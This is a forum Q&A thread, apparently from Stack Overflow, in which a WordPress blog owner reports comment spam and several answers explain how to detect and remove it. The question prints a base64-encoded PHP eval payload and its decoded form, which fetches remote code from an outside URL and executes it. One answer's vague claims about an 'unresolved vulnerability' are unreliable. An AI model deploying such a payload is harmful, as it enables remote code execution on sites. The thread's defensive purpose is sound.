
I'm using a WordPress blog. Today I got a comment like this:

<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->

When I decoded this comment using a decoder I got:

$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);

I'm getting many comments like this. Can anyone help me resolve this problem? Is it a hack, or does it show the beginning of hacking?

Pranav Raj S
  • Backup your data earliest – swapnesh May 16 '13 at 12:25
  • This looks like a hack attempt, but if you are using a standard WordPress theme and commenting system, then you should be fine - your server is probably not executing that PHP. Do you have any reason to believe it is actually being run on your server? – halfer May 16 '13 at 12:29

3 Answers


It is a hack or at least an attempt. They are taking advantage of an unresolved WordPress vulnerability that can allow them to download and execute code, among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these types of code snippets around your server side, then please do more research to determine if you are truly infected and, if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual WordPress site admins either allowing, via ignorance, or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web, so you will likely have to do a good bit of research to be sure your site is OK. To help you research, I'll clarify the terminology of this hack.

This is a PHP code injection attack that is most likely attempting to exploit a known vulnerability in the WordPress framework. It is using Base64-encoded PHP code to inject itself onto your hosting server via eval(), which is a programming language construct that is present in nearly all programming languages, including PHP. Hackers with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised WordPress sites, so be extremely careful when handling this type of problem.

Durandal

None of the suggestions worked for us. The following is how we removed malicious code from multiple WordPress sites without any downtime.

We ran into a problem where we had multiple legacy WordPress sites sharing one filesystem that was infiltrated by this virus.

We ended up writing a little Python script to traverse our filesystem and detect the malicious code.

Here's the code for anyone interested (NOTE: USE AT OWN RISK): https://github.com/michigan-com/eval_scrubber

pip install eval_scrubber
# finds all infected files, will not do anything but READ
python -m eval_scrubber find .
# attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .

That script will scan the filesystem for malicious content and, as a separate command, it will attempt to remove the base64 eval functions.

This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor which process was writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

Once we found the generator of the virus, we did one more eval_scrubber remove, and then our problem was fixed.

neurosnap

I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once:

Threat scan plugin

BUT

There was an index file with a short 2 lines of code. Those 2 lines were injecting eval over and over. I forgot which index.php it was, but look in these folders:

  • wp-admin
  • wp-content
  • wp-includes

Try to search for md5 in your files using Dreamweaver.

Hope you'll be able to fix it.

kenorb